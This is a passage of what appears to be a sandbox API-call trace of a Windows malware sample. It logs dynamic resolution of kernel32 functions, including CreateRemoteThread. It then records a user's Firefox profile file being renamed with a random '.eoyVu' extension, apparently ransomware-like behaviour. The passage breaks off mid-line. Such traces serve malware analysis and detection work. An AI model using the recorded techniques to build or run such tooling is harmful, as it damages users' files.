lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.615] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.616] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.616] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.616] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.616] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.616] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.616] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.616] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.616] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.616] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.616] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.616] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.616] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.616] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.616] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.617] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.617] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.617] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.617] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.617] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.617] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.617] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.617] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.617] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.617] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.617] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.617] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.617] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.617] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.617] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.617] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.617] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.617] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.617] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.618] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.618] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.618] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.618] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.618] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.618] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.618] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.618] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.618] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.618] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.618] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.618] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.618] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.618] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.618] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.618] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.618] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.618] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.619] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.619] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.619] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.619] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.619] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.619] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.619] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.619] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.619] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.619] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.619] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.619] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.619] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.619] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.619] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.619] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.619] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.619] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.620] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.620] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.620] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.620] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.620] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.620] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.620] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.620] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.620] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.620] lstrlenA (lpString="DELETEATOM") returned 10 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.620] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.620] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.620] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.620] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.620] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.620] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.620] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.620] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.621] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.621] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.621] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.621] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.621] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.621] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.621] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.621] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.621] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.621] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.621] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.621] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.621] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.621] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.621] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.621] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.622] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.622] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.622] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.622] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.622] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.622] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.622] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.622] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.622] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.622] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.622] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.622] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.622] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.622] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.622] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 106 [0081.623] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.eoyVu") returned 112 [0081.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.eoyVu" (normalized: "c:\\users\\5p5nrgjn0js 